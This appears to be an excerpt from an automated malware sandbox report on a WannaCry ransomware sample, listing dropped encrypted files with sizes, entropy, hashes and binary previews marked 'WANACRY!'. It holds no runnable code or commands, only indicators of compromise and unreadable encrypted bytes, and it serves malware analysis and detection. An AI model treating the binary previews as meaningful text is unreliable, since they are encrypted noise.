                                                                                      Preview:WANACRY!........,.<.6...^^......}.d...x.r.E.T..D.~.Ln.Y.q(H...!@U..e.S.A...}`Lj%E....X. ....E0h.=.!..\*.."........{.W.1.8...q...x..f:.d.~x..".. YWJ..'^.9..Z.;..WB#9...vq..Q..?.%.E...zAK./D7....i.....j....~.......L...9.f:y.....~Dz;k.+.J......h.].....uv. ...}....G.........d..).5.[jQ.I*DA...........86|..L.......;zwu(2.(.%d_.H5.8.1....t:g....kO}............d5.V.P.l.qiS.L.<B..-W_....S..4%.1J....Q...v......,.TB..../...E....R.....x....^.d........'c6.....]X..mO>WX...724.5..H.e..g(. 2..I..f..+.....J.Td........ir.t_d..,.....6.=YKQe.)."...H.QU..R;..U..qD.....a..,.A....K....=].7..!..6...c..n.:;./..........(...&<....SQ.}X.?..zr.o...9..[+....r.6Zh7D8....7.....ok|d[..#...SOIi...E.^..f..p`.Ab!,......_..E.......*..S..C...aW...+|...........sK..^..9.o.V.....y...v_... ......+T..rM....0.<.e>.S...&.L.U..}9|..o.~<..z..Ta.R.{{`..!=.3O.g..eE...j[4F.....{..Uc.....;.E...m..R..'..,B.z.0..^2..6z.J0.y.X....W.W^|.`.V...'.....7.c.wF...\vl]..Y..\.k.9..&..h.y.f...w.t..0..A.D*t78
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):127736
                                                                                      Entropy (8bit):7.998453961629513
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:tDA1mqBBg0gWH1iCtK4zPeZ+6uuDad5cElI:5AgqwWH1mZ+6uLjcyI
                                                                                      MD5:6EA1C667465DD2FF20680F675152ACE0
                                                                                      SHA1:B07D79A67186D6C3E3DCBAA4189469C82C64C98C
                                                                                      SHA-256:DBC3E16DA9F380B4B52B856A888EA3A4B3427729B0894BEC22555C11C515240A
                                                                                      SHA-512:3FF5114221D72CE1E15F19E5C71CD22E3F589ED96C89A23FE6784A5D90B05337ADB4F98975820D588C9CC6BCC4E4EEA993191C1B0D7CA598D94DBA2C96E4FE6F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....`.,wr..2G.2x....SA.V<..^I.b....I.qop7.......c_.g.M......].M........u....[.l.Y9.ym.ffd...=?.z.Vb.\..M1..]..I..d..$R.2#.0.).".*..x..g.~..]...."s.#..z.X..l.b.-t.eK..1...*8s .}.I|*....l....z..c.....2.Y......&..e.. .K_..R..~.0.....4.x.;<......)...$................E.@..+.".....`....T.D....6.HTh<.h......r.S.o.,'...y+../..v..^..).,{..SQ.9.c..,M.d.}QB..R. ...........0U.j.\.O....6....;#.1m{./.J...vx.?...}~....n...>C..s........|..J...a...=...v!...........L.AJD...4.F..Qq..R.....J..}..L..|QT.&.^......_.L....a..9fa..k.qK....F`......>.....dy.|..."?....Q".u.i.X..J$..8.....=....8..V.D..Ei.}..Q.:..}.6.......q!e.J....]...O..........@_l\_..O..w_jQ.=..D~o..z../7..v..(J.......,.T......f.<.<4...o`...P..U..]?G.x.+.x}1.h...........n.j .M..*.E&...UAN....r..=.f.%..I...Q"..3.&.%..R../.5.x.kFn...p.i.F$ZaK}2._e*.#./g..F....,.{........2.4.-c...._.y~a.1n..}.E..F.f.z$.9=.\.....V,..<...W....!.J$..R\.......o.fM/a....V0;.".v.)W.Z.dn...[#....@...'i.....P+.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):127736
                                                                                      Entropy (8bit):7.998453961629513
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:tDA1mqBBg0gWH1iCtK4zPeZ+6uuDad5cElI:5AgqwWH1mZ+6uLjcyI
                                                                                      MD5:6EA1C667465DD2FF20680F675152ACE0
                                                                                      SHA1:B07D79A67186D6C3E3DCBAA4189469C82C64C98C
                                                                                      SHA-256:DBC3E16DA9F380B4B52B856A888EA3A4B3427729B0894BEC22555C11C515240A
                                                                                      SHA-512:3FF5114221D72CE1E15F19E5C71CD22E3F589ED96C89A23FE6784A5D90B05337ADB4F98975820D588C9CC6BCC4E4EEA993191C1B0D7CA598D94DBA2C96E4FE6F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....`.,wr..2G.2x....SA.V<..^I.b....I.qop7.......c_.g.M......].M........u....[.l.Y9.ym.ffd...=?.z.Vb.\..M1..]..I..d..$R.2#.0.).".*..x..g.~..]...."s.#..z.X..l.b.-t.eK..1...*8s .}.I|*....l....z..c.....2.Y......&..e.. .K_..R..~.0.....4.x.;<......)...$................E.@..+.".....`....T.D....6.HTh<.h......r.S.o.,'...y+../..v..^..).,{..SQ.9.c..,M.d.}QB..R. ...........0U.j.\.O....6....;#.1m{./.J...vx.?...}~....n...>C..s........|..J...a...=...v!...........L.AJD...4.F..Qq..R.....J..}..L..|QT.&.^......_.L....a..9fa..k.qK....F`......>.....dy.|..."?....Q".u.i.X..J$..8.....=....8..V.D..Ei.}..Q.:..}.6.......q!e.J....]...O..........@_l\_..O..w_jQ.=..D~o..z../7..v..(J.......,.T......f.<.<4...o`...P..U..]?G.x.+.x}1.h...........n.j .M..*.E&...UAN....r..=.f.%..I...Q"..3.&.%..R../.5.x.kFn...p.i.F$ZaK}2._e*.#./g..F....,.{........2.4.-c...._.y~a.1n..}.E..F.f.z$.9=.\.....V,..<...W....!.J$..R\.......o.fM/a....V0;.".v.)W.Z.dn...[#....@...'i.....P+.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):173608
                                                                                      Entropy (8bit):7.999003703042425
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:1YVuGNrLBYqwbPI2hqSsVZ5aYaOhbf5FbtlEtoOD9Hzsrbts+al:4NrFabQwWnYUBtV6srbtxal
                                                                                      MD5:36448331FF139862CA47BCFF9326ACEB
                                                                                      SHA1:05A1F86A758835D6099904DB98F724136C411FA5
                                                                                      SHA-256:9C57B452F7013F1CFC0F3EB955FD50E4A369766F070CCB1AE25D418D351B481B
                                                                                      SHA-512:DE133A09A1F34EE814B69FA3DB139D20A0917EB25D954008F57F6AC1C97F1EB3D79497FDBF7E7062318B5F4B96D684325DF8903ED6E9ED79306646D196CC45F2
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d.g.{...E..`j..2.>EY.....U...3#..-...)!.>r..[/6.....(....B'r.....l"...7.>i:...\j.r...F.._.-[.f.T...~.5hJ..+.@....M...]|...5./.1V..,sL..*.c.yJ.....>.wh&R....Kqc.......`g!.r...{....~...Oo.=[!7.e........o.. ...J0.2...o..V{.Hy.h..E.n$.x.................]y......h...M..Q"8.....OY.e,..?<"...ha].'...H.4..\..i.B.j....uj....A....U....sa...r._z-n..8....F.U91T...g.L.w.X..#.Y.Z..H.,...@..{...O/.S.M....)CXG.0.ro.5b!c.>..y.........x...........b)..Vbn....].]g.....e. .G.eL.]I..z...g.......r6......8$.........1{.W.v.f....h..^.#:.<.W.&.G.......&.d@.>..w:#......sz0F...s.'.f..7..Z...c>...x.|...B#...!Ct...q.b7.e.{C.Q..y..}...0...U..jqJ.....nB...kn.:.m"H![.E@y...\.^..=...sS.b...."/.....V?........(.$=D..-....z.....:........|.......AF...:...B(..kx...O...Jd5.J~8.].^]..(....X.$.H..j8..a..i.x.Tf.....OHG.....[..G.lK.....A..N....*A|{..H..O.LN....*.h...OA.L..</.Cg..<.K.Mo.GR./..hH...>..7g..v.,A..:.>].A....N.._...'k....:...8-}C...k*.H0"V.]
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):173608
                                                                                      Entropy (8bit):7.999003703042425
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:1YVuGNrLBYqwbPI2hqSsVZ5aYaOhbf5FbtlEtoOD9Hzsrbts+al:4NrFabQwWnYUBtV6srbtxal
                                                                                      MD5:36448331FF139862CA47BCFF9326ACEB
                                                                                      SHA1:05A1F86A758835D6099904DB98F724136C411FA5
                                                                                      SHA-256:9C57B452F7013F1CFC0F3EB955FD50E4A369766F070CCB1AE25D418D351B481B
                                                                                      SHA-512:DE133A09A1F34EE814B69FA3DB139D20A0917EB25D954008F57F6AC1C97F1EB3D79497FDBF7E7062318B5F4B96D684325DF8903ED6E9ED79306646D196CC45F2
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d.g.{...E..`j..2.>EY.....U...3#..-...)!.>r..[/6.....(....B'r.....l"...7.>i:...\j.r...F.._.-[.f.T...~.5hJ..+.@....M...]|...5./.1V..,sL..*.c.yJ.....>.wh&R....Kqc.......`g!.r...{....~...Oo.=[!7.e........o.. ...J0.2...o..V{.Hy.h..E.n$.x.................]y......h...M..Q"8.....OY.e,..?<"...ha].'...H.4..\..i.B.j....uj....A....U....sa...r._z-n..8....F.U91T...g.L.w.X..#.Y.Z..H.,...@..{...O/.S.M....)CXG.0.ro.5b!c.>..y.........x...........b)..Vbn....].]g.....e. .G.eL.]I..z...g.......r6......8$.........1{.W.v.f....h..^.#:.<.W.&.G.......&.d@.>..w:#......sz0F...s.'.f..7..Z...c>...x.|...B#...!Ct...q.b7.e.{C.Q..y..}...0...U..jqJ.....nB...kn.:.m"H![.E@y...\.^..=...sS.b...."/.....V?........(.$=D..-....z.....:........|.......AF...:...B(..kx...O...Jd5.J~8.].^]..(....X.$.H..j8..a..i.x.Tf.....OHG.....[..G.lK.....A..N....*A|{..H..O.LN....*.h...OA.L..</.Cg..<.K.Mo.GR./..hH...>..7g..v.,A..:.>].A....N.._...'k....:...8-}C...k*.H0"V.]
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):59016
                                                                                      Entropy (8bit):7.996776131300037
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:AyxZ2mYuSkklybzbdcCt1aGBUYG0kKJSGcDLH:AyxnoSPaGBPGLKH+LH
                                                                                      MD5:C85DA9A5203FA585128792B462DD06AB
                                                                                      SHA1:49C3EE806E8C777F4F4D5BD7D26F35CAC9C281F7
                                                                                      SHA-256:AC022A7A198A7ADDD3BC0D66E837E8E105FC26E1454DF01D1CEBBF4F735ABEDE
                                                                                      SHA-512:558A73757DC8AFFE31BCAE2A92D39CB84A3008B14040CEEB1D2170BCA044CB71284BCBA5A1E4C38F8238F1F4E449903BE6ADB033FF4AD445D3426191B2F3096F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....0....sM$n.rn2.~..i....I3..5..[F....G............8_.A.v...A..@.0...@e.h...N4..P.2FC...C[....G...(.m......Q..]Z0..E...g1b1K........./.2A`.....;8n.]..._R.i.?...S....O..-.......F.C...]p..Y..........$.*6h.....>+WfJ..e ..Sk..}j....q.Z.B.r...:..nZ.?!....g.......C..i8.]<.E..W.<}S3..C..r...W;c.z.gc\R....3,/$&.Hh...G'....c...8.S...:......R...o.....j..6...Z.h..\(.L.N*3.h.z.9..+Z.....ts..X.Kc.=s..C.F>:.,M&...$..Q!U.$.*!o.Q.?.qf.Ul...G|m`...y......^0|Z..Hi..q.e{.....f..P5.......$Qk&.\..x.%...O..V}D.."......}u....!... .......&R.....g.=.7..Mh.De....'+#...O...7[!.Z..5...k.r.r]T.NS....T...B1......O.[..W=..3p..g..(l...sK.`.{.E+..a..<....scu.,...-2.u?.w.7...1+..0...Q.{4h.wo.iw-.eU....=.9%...cj...A..u.P...X..9j.4.E.5Z..9..]...a>."...-.e.g.P.J.y...>....N..&.B-r..i.w[j..8......P.u`.}....q..TF.K.v".#.u..^E.MQ.p.{..K.)......A....V..r..9<$...X..A.5J..U..D..lD...#".Z..Ah....F...S.4@...QQ...z..>.&..3=......a_v........T!.....].2!..G...P(..0.G%.S~.7.s"..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):59016
                                                                                      Entropy (8bit):7.996776131300037
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:AyxZ2mYuSkklybzbdcCt1aGBUYG0kKJSGcDLH:AyxnoSPaGBPGLKH+LH
                                                                                      MD5:C85DA9A5203FA585128792B462DD06AB
                                                                                      SHA1:49C3EE806E8C777F4F4D5BD7D26F35CAC9C281F7
                                                                                      SHA-256:AC022A7A198A7ADDD3BC0D66E837E8E105FC26E1454DF01D1CEBBF4F735ABEDE
                                                                                      SHA-512:558A73757DC8AFFE31BCAE2A92D39CB84A3008B14040CEEB1D2170BCA044CB71284BCBA5A1E4C38F8238F1F4E449903BE6ADB033FF4AD445D3426191B2F3096F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....0....sM$n.rn2.~..i....I3..5..[F....G............8_.A.v...A..@.0...@e.h...N4..P.2FC...C[....G...(.m......Q..]Z0..E...g1b1K........./.2A`.....;8n.]..._R.i.?...S....O..-.......F.C...]p..Y..........$.*6h.....>+WfJ..e ..Sk..}j....q.Z.B.r...:..nZ.?!....g.......C..i8.]<.E..W.<}S3..C..r...W;c.z.gc\R....3,/$&.Hh...G'....c...8.S...:......R...o.....j..6...Z.h..\(.L.N*3.h.z.9..+Z.....ts..X.Kc.=s..C.F>:.,M&...$..Q!U.$.*!o.Q.?.qf.Ul...G|m`...y......^0|Z..Hi..q.e{.....f..P5.......$Qk&.\..x.%...O..V}D.."......}u....!... .......&R.....g.=.7..Mh.De....'+#...O...7[!.Z..5...k.r.r]T.NS....T...B1......O.[..W=..3p..g..(l...sK.`.{.E+..a..<....scu.,...-2.u?.w.7...1+..0...Q.{4h.wo.iw-.eU....=.9%...cj...A..u.P...X..9j.4.E.5Z..9..]...a>."...-.e.g.P.J.y...>....N..&.B-r..i.w[j..8......P.u`.}....q..TF.K.v".#.u..^E.MQ.p.{..K.)......A....V..r..9<$...X..A.5J..U..D..lD...#".Z..Ah....F...S.4@...QQ...z..>.&..3=......a_v........T!.....].2!..G...P(..0.G%.S~.7.s"..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):20552
                                                                                      Entropy (8bit):7.990887281143983
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:MA6vdnkY5XLD8iPgw9yD9MG5yZZEqYk4q5HPCDxcTYhkEZseHRR7MjxkYgcXleof:MvppRPge8X54HYgBaFcsFZseH3kgcXlV
                                                                                      MD5:1B8C3C1F2559A3EDF106CF154211F6CA
                                                                                      SHA1:DF165653F2BD52B0BB730E02850C02C9BF1EC80A
                                                                                      SHA-256:63844AC5E3C48E025BB4A872B67BA6BA092450605977BF947521B99EF51EC6BD
                                                                                      SHA-512:A2C05ED28C717FE1FBD0E6F6F313D5769F6B4FF98BEBD0F82DDA308FD27BBAB7321421B12461BDA292C5811E540514F199534979E5E58F46DDC123438C5039DA
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....D..Y-C.n.+..dM......+WV.Kd..Z.......+1...U..X@..f.se..4 .n..6a..5..A..'*..XfL.CI.o...J...KuK../6J..`.T.e.../..|.X....N.......,.q........i..T.C..@O..".#PSu5.3.@.q.|..........{.].a.r.....Of..@Tn......7..."s*..I...v..0;/>7.X...$a..W.t..E.....$O..........G.\.Y.1.FT^E..9..Y..#...x.-...3....NH.Y..d...KSx/k...<.]..y.<....V.(KA...|#3.p..e..%<....K.O.-@...g.....eR.<_....Q....>....c^.u.=.N.....*..p..1.T......Lc...n..bt..w'u)C.n.7..4B.WL..{;?/m{.1e.;..:.w..!..ME.8...B...E|jU.....lw.1D...(.1..o/.2.0[.x.).I...Zt...[Gt._bH..".......O4.W2..B.Q.w....h.@4...e..5...d."...4.@.UvG#..tT.4..E.........i.'..M....\.+......&f.W=S.:..Q....x...-.\....].*>n...b.fF*J..C"..>..I......A$L~aB..$x.0YH...Pz......../..g..R......$.....G.....!....%..!...O.(.].......[ntZD..C).*.Z..zN....3.>;...].|.......8]\..H......Q.).k,....v~ YF..'..U...r....J.k.*[r.D| .J..ER..no.O.....~.I..=o...........M.5}/F .`...A".....J..0.k4.V.d..D.Q..CK.AQ.y.}.X.2.:..lA..3._.;mp....M..^.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):20552
                                                                                      Entropy (8bit):7.990887281143983
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:MA6vdnkY5XLD8iPgw9yD9MG5yZZEqYk4q5HPCDxcTYhkEZseHRR7MjxkYgcXleof:MvppRPge8X54HYgBaFcsFZseH3kgcXlV
                                                                                      MD5:1B8C3C1F2559A3EDF106CF154211F6CA
                                                                                      SHA1:DF165653F2BD52B0BB730E02850C02C9BF1EC80A
                                                                                      SHA-256:63844AC5E3C48E025BB4A872B67BA6BA092450605977BF947521B99EF51EC6BD
                                                                                      SHA-512:A2C05ED28C717FE1FBD0E6F6F313D5769F6B4FF98BEBD0F82DDA308FD27BBAB7321421B12461BDA292C5811E540514F199534979E5E58F46DDC123438C5039DA
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....D..Y-C.n.+..dM......+WV.Kd..Z.......+1...U..X@..f.se..4 .n..6a..5..A..'*..XfL.CI.o...J...KuK../6J..`.T.e.../..|.X....N.......,.q........i..T.C..@O..".#PSu5.3.@.q.|..........{.].a.r.....Of..@Tn......7..."s*..I...v..0;/>7.X...$a..W.t..E.....$O..........G.\.Y.1.FT^E..9..Y..#...x.-...3....NH.Y..d...KSx/k...<.]..y.<....V.(KA...|#3.p..e..%<....K.O.-@...g.....eR.<_....Q....>....c^.u.=.N.....*..p..1.T......Lc...n..bt..w'u)C.n.7..4B.WL..{;?/m{.1e.;..:.w..!..ME.8...B...E|jU.....lw.1D...(.1..o/.2.0[.x.).I...Zt...[Gt._bH..".......O4.W2..B.Q.w....h.@4...e..5...d."...4.@.UvG#..tT.4..E.........i.'..M....\.+......&f.W=S.:..Q....x...-.\....].*>n...b.fF*J..C"..>..I......A$L~aB..$x.0YH...Pz......../..g..R......$.....G.....!....%..!...O.(.].......[ntZD..C).*.Z..zN....3.>;...].|.......8]\..H......Q.).k,....v~ YF..'..U...r....J.k.*[r.D| .J..ER..no.O.....~.I..=o...........M.5}/F .`...A".....J..0.k4.V.d..D.Q..CK.AQ.y.}.X.2.:..lA..3._.;mp....M..^.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):37464
                                                                                      Entropy (8bit):7.994854708036477
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:R/lx2zpeSEOeNuQb3fNffNOz2c7YJwLZ3NTXg9qhcW6IZ7wjfvQBP:RNx2FgQQTNfVOzXQw1RHR6mwjXQB
                                                                                      MD5:7C503586788E71BA32D39DACF9400120
                                                                                      SHA1:9FC5FE96DF8AA191428097D76F53E70FD8CA9FB7
                                                                                      SHA-256:F960D52D98560022897D9C3E03F3FDDD09FCAE2BCAE8941B4BCFCADE656C05F5
                                                                                      SHA-512:458F625FE41E32D86BB8096441812771E975ACA64FA7A8A0D1012ED2FEC102F65FC3114638BD758BEB6E1B7363551740A78979B8839A33CB2F699E142761E594
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....{..Mo T-..k.\..4{......l..w..y.p......I...K.....v.$..@.m.di..P2..d...c..,..j.../M#...%..#..,.y..^?qL..d.{E.K`.:-..b...D...v[.....x..r..@sKHs...F...W..>.....~...{,.z-....B.v.Q..2[AH..aF...)l.%.Q8........#..D...pn..|..H.P..\..: .E.A.%.~&>..."...YGl.....4..........LZ.4...Xd.&%.|....oo....\.l.].........;(O.AE..>.[m>...$..B.x..r;.{.s%.>....'#)~!.+|.%.5>..~.y..9...=Y.....(.IT#jDo..XZSd..J_9\(.'h.m^....s....5..^....a"..[ofi.o.<PfB...0...E...aE"...mP.jA.e....a.~.U[:.a[...H.]<.E.V..7...e.D..m....M.K.r.Z.z.,.0...a...Vp...Q=...$q..n.j...;e.K....G.(V.IxF%re.....{k....3n/.#.....Y.>7.=..Q.a.....#.(YO-.o!..3.....+.^4.......Q....t...S.K~,,w.P.P..uL.>kq/Pf9...%...H...?..e...C...Z.S.......3..s.\.....$iXM.N...9..u3.eb...x:.ry...-.R...x.:w...C>.W..\.$Z'M...B.`.....%f.T.1..zX.....E]f2...h\..../A 9..c.+..T....Q?..;0E'.V.V,t..y/..q..b^.).N.mb....+.....d.u..Q...... .....f/.K...........=WCC.n.jF.;..I.}..!7`!..y0.}G..e.R.s..t...E..f..8.Jd.H......j...7...#=s.P..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):37464
                                                                                      Entropy (8bit):7.994854708036477
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:R/lx2zpeSEOeNuQb3fNffNOz2c7YJwLZ3NTXg9qhcW6IZ7wjfvQBP:RNx2FgQQTNfVOzXQw1RHR6mwjXQB
                                                                                      MD5:7C503586788E71BA32D39DACF9400120
                                                                                      SHA1:9FC5FE96DF8AA191428097D76F53E70FD8CA9FB7
                                                                                      SHA-256:F960D52D98560022897D9C3E03F3FDDD09FCAE2BCAE8941B4BCFCADE656C05F5
                                                                                      SHA-512:458F625FE41E32D86BB8096441812771E975ACA64FA7A8A0D1012ED2FEC102F65FC3114638BD758BEB6E1B7363551740A78979B8839A33CB2F699E142761E594
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....{..Mo T-..k.\..4{......l..w..y.p......I...K.....v.$..@.m.di..P2..d...c..,..j.../M#...%..#..,.y..^?qL..d.{E.K`.:-..b...D...v[.....x..r..@sKHs...F...W..>.....~...{,.z-....B.v.Q..2[AH..aF...)l.%.Q8........#..D...pn..|..H.P..\..: .E.A.%.~&>..."...YGl.....4..........LZ.4...Xd.&%.|....oo....\.l.].........;(O.AE..>.[m>...$..B.x..r;.{.s%.>....'#)~!.+|.%.5>..~.y..9...=Y.....(.IT#jDo..XZSd..J_9\(.'h.m^....s....5..^....a"..[ofi.o.<PfB...0...E...aE"...mP.jA.e....a.~.U[:.a[...H.]<.E.V..7...e.D..m....M.K.r.Z.z.,.0...a...Vp...Q=...$q..n.j...;e.K....G.(V.IxF%re.....{k....3n/.#.....Y.>7.=..Q.a.....#.(YO-.o!..3.....+.^4.......Q....t...S.K~,,w.P.P..uL.>kq/Pf9...%...H...?..e...C...Z.S.......3..s.\.....$iXM.N...9..u3.eb...x:.ry...-.R...x.:w...C>.W..\.$Z'M...B.`.....%f.T.1..zX.....E]f2...h\..../A 9..c.+..T....Q?..;0E'.V.V,t..y/..q..b^.).N.mb....+.....d.u..Q...... .....f/.K...........=WCC.n.jF.;..I.}..!7`!..y0.}G..e.R.s..t...E..f..8.Jd.H......j...7...#=s.P..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):6.983176663298126
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEtDmA1joK44xzvWrYuYafT7huwl4c6J/I7ctbQJcyqtpmv47Ck:bkEtvoPAvWMJafTR4c77XcyqtIviCk
                                                                                      MD5:97538CCD0B5B48FB1BB58C30F3AB38D3
                                                                                      SHA1:8BD1FEF4650DDAF5B868FE1AC0129FFB5F461F7A
                                                                                      SHA-256:E732FEB01DBFFC202A276C55FA5192438D868AB527D9D339B4CE842232775948
                                                                                      SHA-512:F952152C15D22AF7237DD9BDE94281BDE0E04ABCB76F9518352093B852390D80E403869E34BF780C3305B3D39F2426EA99AE08F8BFF9372BC0054B184A2038F8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......G....g.I..)..'..W..<..:z.r.._.R.......s.........<.X..;..i....V^.F....4w.....+g-_.....u.}...$Sb...w.9......!OA..'5.:.....^_D.#J...L......$<....^.N........]._..z}W=h;...b.^~M5'.......j-.w"..+y..q...,.|%.5.uiz.R=$=......rMR....<./.'&....]K.............?......%...W..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):6.983176663298126
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEtDmA1joK44xzvWrYuYafT7huwl4c6J/I7ctbQJcyqtpmv47Ck:bkEtvoPAvWMJafTR4c77XcyqtIviCk
                                                                                      MD5:97538CCD0B5B48FB1BB58C30F3AB38D3
                                                                                      SHA1:8BD1FEF4650DDAF5B868FE1AC0129FFB5F461F7A
                                                                                      SHA-256:E732FEB01DBFFC202A276C55FA5192438D868AB527D9D339B4CE842232775948
                                                                                      SHA-512:F952152C15D22AF7237DD9BDE94281BDE0E04ABCB76F9518352093B852390D80E403869E34BF780C3305B3D39F2426EA99AE08F8BFF9372BC0054B184A2038F8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......G....g.I..)..'..W..<..:z.r.._.R.......s.........<.X..;..i....V^.F....4w.....+g-_.....u.}...$Sb...w.9......!OA..'5.:.....^_D.#J...L......$<....^.N........]._..z}W=h;...b.^~M5'.......j-.w"..+y..q...,.|%.5.uiz.R=$=......rMR....<./.'&....]K.............?......%...W..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.157752920192404
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEMQ8HRRpX+vILgpXly+QdqjJC2W4ihz5Up0YurmISdTHkYx+RWn:bkEazX+vIWlQBApB53xSWn
                                                                                      MD5:7C64924DD947A608BD15DBCAB6AD0161
                                                                                      SHA1:30BECB959517F50607A29A58FA4683042FA319CA
                                                                                      SHA-256:6031FAE9E2F28F55846D6EA15AAEDEDFC85D50256C83106526F92F12C29DB4BE
                                                                                      SHA-512:A023C16DA4C67712436564B345D1C2475D3925C047A5541AAA30D145A77BFBC2E034E17D0F6C7A037BEEF2F776C9A6161BA72AAE1673A6AA020DF3D6930D882C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....8l.....1e..K...)U.dB..p..;.h=..........&.b.$.S..O.w.GTT*ot.M$s.m.....U..U-...@...KIK*V"...B_..f..[.e"O.8.86.....^...."...x..K.@......'..H..V]..,~a.t"......!.s_...,......k..7'..V....F9.=..C........`..v.t.:].I7~]%._..>|..j.[].n..|E..V....?-bv............!=4..}... ...A.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.157752920192404
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEMQ8HRRpX+vILgpXly+QdqjJC2W4ihz5Up0YurmISdTHkYx+RWn:bkEazX+vIWlQBApB53xSWn
                                                                                      MD5:7C64924DD947A608BD15DBCAB6AD0161
                                                                                      SHA1:30BECB959517F50607A29A58FA4683042FA319CA
                                                                                      SHA-256:6031FAE9E2F28F55846D6EA15AAEDEDFC85D50256C83106526F92F12C29DB4BE
                                                                                      SHA-512:A023C16DA4C67712436564B345D1C2475D3925C047A5541AAA30D145A77BFBC2E034E17D0F6C7A037BEEF2F776C9A6161BA72AAE1673A6AA020DF3D6930D882C
                                                                                      Malicious:false
                                                                                      Reputation:low
